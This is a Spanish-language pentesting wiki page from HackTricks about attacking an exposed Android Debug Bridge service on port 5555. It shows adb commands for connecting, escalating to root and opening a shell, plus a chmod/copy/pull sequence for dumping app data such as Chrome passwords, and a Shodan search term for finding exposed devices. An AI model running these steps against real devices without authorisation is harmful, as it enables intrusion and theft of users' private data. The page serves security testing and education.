hacktricks/network-services-pentesting/5555-android-debug-bridge.md

4.1 KiB

5555 - Android Debug Bridge

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Información Básica

Desde la documentación:

Android Debug Bridge (adb) es una herramienta versátil de línea de comandos que te permite comunicarte con un dispositivo. El comando adb facilita una variedad de acciones en el dispositivo, como instalar y depurar aplicaciones, y proporciona acceso a una shell Unix que puedes utilizar para ejecutar una variedad de comandos en un dispositivo.

Puerto predeterminado: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Conectar

Si encuentras el servicio ADB ejecutándose en un puerto de un dispositivo y puedes conectarte a él, puedes obtener una shell dentro del sistema:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Para más comandos de ADB, consulta la siguiente página:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Volcar datos de la aplicación

Para descargar completamente los datos de una aplicación, puedes:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Puedes usar este truco para recuperar información sensible como contraseñas de Chrome. Para obtener más información al respecto, consulta la información y referencias proporcionadas aquí.

Shodan

  • android debug bridge
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: